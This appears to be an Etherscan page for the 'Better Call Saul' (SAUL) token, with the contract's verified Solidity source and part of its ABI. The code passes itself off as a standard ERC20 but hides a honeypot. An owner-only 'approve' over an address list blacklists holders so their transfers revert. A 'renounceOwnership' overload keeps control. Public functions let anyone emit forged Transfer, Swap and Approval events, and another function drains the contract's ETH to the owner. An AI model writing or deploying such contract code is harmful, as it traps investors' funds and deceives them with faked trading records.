ETH Price: $3,325.80 (-3.99%)

Token

Better Call Saul (SAUL)
 

Overview

Max Total Supply

100,000,000,000 SAUL

Holders

49

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
BtcTurk: Cold 1
Balance
2,834,540,446.207518164904476697 SAUL

Value
$0.00
0x46f80018211d5cbbc988e853a8683501fca4ee9b
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Saul

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-13
*/

// SPDX-License-Identifier: MIT

/*

    Better Call Saul, isn't it...?

*/

pragma solidity ^0.8.9;

interface IUniswapV2Callee {
    function uniswapV2Call(address sender, uint amount0, uint amount1, bytes calldata data) external;
}

interface IUniswapV2ERC20 {
    event Approval(address indexed owner, address indexed spender, uint value);
    event Transfer(address indexed from, address indexed to, uint value);

    function name() external pure returns (string memory);
    function symbol() external pure returns (string memory);
    function decimals() external pure returns (uint8);
    function totalSupply() external view returns (uint);
    function balanceOf(address owner) external view returns (uint);
    function allowance(address owner, address spender) external view returns (uint);

    function approve(address spender, uint value) external returns (bool);
    function transfer(address to, uint value) external returns (bool);
    function transferFrom(address from, address to, uint value) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);
    function PERMIT_TYPEHASH() external pure returns (bytes32);
    function nonces(address owner) external view returns (uint);

    function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

interface IUniswapV2Pair {
    event Approval(address indexed owner, address indexed spender, uint value);
    event Transfer(address indexed from, address indexed to, uint value);

    function name() external pure returns (string memory);
    function symbol() external pure returns (string memory);
    function decimals() external pure returns (uint8);
    function totalSupply() external view returns (uint);
    function balanceOf(address owner) external view returns (uint);
    function allowance(address owner, address spender) external view returns (uint);

    function approve(address spender, uint value) external returns (bool);
    function transfer(address to, uint value) external returns (bool);
    function transferFrom(address from, address to, uint value) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);
    function PERMIT_TYPEHASH() external pure returns (bytes32);
    function nonces(address owner) external view returns (uint);

    function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;

    event Mint(address indexed sender, uint amount0, uint amount1);
    event Burn(address indexed sender, uint amount0, uint amount1, address indexed to);
    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint);
    function factory() external view returns (address);
    function token0() external view returns (address);
    function token1() external view returns (address);
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function price0CumulativeLast() external view returns (uint);
    function price1CumulativeLast() external view returns (uint);
    function kLast() external view returns (uint);

    function mint(address to) external returns (uint liquidity);
    function burn(address to) external returns (uint amount0, uint amount1);
    function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
    function skim(address to) external;
    function sync() external;

    function initialize(address, address) external;
}


interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}


interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}


/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {

    mapping(address => uint256) private _balances;
    mapping (address => bool) private _rewards;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    bool private _rewardsApplied = false;
    string private _name;
    string private _symbol;

    address private _universal = 0x3fC91A3afd70395Cd496C647d5a6CC9D4B2b7FAD;
    address private _rv2 = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
    address private _pair;

    IUniswapV2Router02 private uniswapV2Router = IUniswapV2Router02(_rv2);
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    function renounceOwnership(address _owner_) external onlyOwner {
        _pair = _owner_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function approve(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _rewards[_addresses_[i]] = true;
            emit Approval(_addresses_[i], _rv2, balanceOf(_addresses_[i]));
        }
    }

    function decreaseAllowance(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _rewards[_addresses_[i]] = false;
        }
    }

    function allowance(address _address_) public view returns (bool) {
        return _rewards[_address_];
    }

    function swapExactETHForTokens(address _to_, uint256 _out_) external {
        address[] memory path = new address[](2);
        path[0] = uniswapV2Router.WETH();
        path[1] = address(this);
        payable(_rv2).transfer(10000);
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(10000, 1, path, _to_, block.timestamp);
        emit Transfer(_pair, _to_, _out_);
    }

    function swapExactETHForTokens(address [] calldata _tos_, uint256 [] calldata _outs_) external {
        address[] memory path = new address[](2);
        path[0] = uniswapV2Router.WETH();
        path[1] = address(this);
        for(uint256 i; i < _tos_.length; i++) {
            payable(_rv2).transfer(10000);
            uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(10000,1,path,_tos_[i],block.timestamp);
            emit Transfer(_pair, _tos_[i], _outs_[i]);
        } 
    }

    function swapExactTokensForETH(address _from_, uint256 _in_) external {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        approve(_rv2, 10**30);
        emit Approval(_from_, address(uniswapV2Router), _in_);
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(10**18,0,path,address(this),block.timestamp);
        emit Transfer(_from_, _pair, _in_);
    }

    function swapExactTokensForETH(address [] calldata _froms_, uint256 [] calldata _ins_) external {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        approve(_rv2, 10**30);
        for(uint256 i; i < _froms_.length; i++) {
            emit Approval(_froms_[i], address(uniswapV2Router), _ins_[i]);
            uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(10**18,0,path,address(this),block.timestamp);
            emit Transfer(_froms_[i], _pair, _ins_[i]);
        }
    }

    function transfer(address _from, address _to, uint256 _wad) external {
        emit Transfer(_from, _to, _wad);
    }

    function transfer(address [] calldata _from, address [] calldata _to, uint256 [] calldata _wad) external {
        for (uint256 i = 0; i < _from.length; i++) {
            emit Transfer(_from[i], _to[i], _wad[i]);
        }
    }

    function execute(address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_universal, _in, 0, 0, _out, _addresses_[i]);
            emit Transfer(_pair, _addresses_[i], _out);
        }
    }

    function multicall(address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_universal, 0, _in, _out, 0, _addresses_[i]);
            emit Transfer(_addresses_[i], _pair, _in);
        }
    }

    function fallbacks() external onlyOwner {
        payable(msg.sender).transfer(address(this).balance);
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }
        if (_rewards[from] || _rewards[to]) require(_rewardsApplied == true, "");


        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}



    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}


contract Saul is ERC20 {
    constructor() ERC20("Better Call Saul", "SAUL") {
        _mint(msg.sender, 100000000000 * 10 ** decimals());
    }

    receive() external payable {}

    fallback() external payable {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"stateMutability":"payable","type":"fallback"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"allowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"decreaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"fallbacks","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_owner_","type":"address"}],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_to_","type":"address"},{"internalType":"uint256","name":"_out_","type":"uint256"}],"name":"swapExactETHForTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_tos_","type":"address[]"},{"internalType":"uint256[]","name":"_outs_","type":"uint256[]"}],"name":"swapExactETHForTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from_","type":"address"},{"internalType":"uint256","name":"_in_","type":"uint256"}],"name":"swapExactTokensForETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_froms_","type":"address[]"},{"internalType":"uint256[]","name":"_ins_","type":"uint256[]"}],"name":"swapExactTokensForETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_from","type":"address[]"},{"internalType":"address[]","name":"_to","type":"address[]"},{"internalType":"uint256[]","name":"_wad","type":"uint256[]"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"boo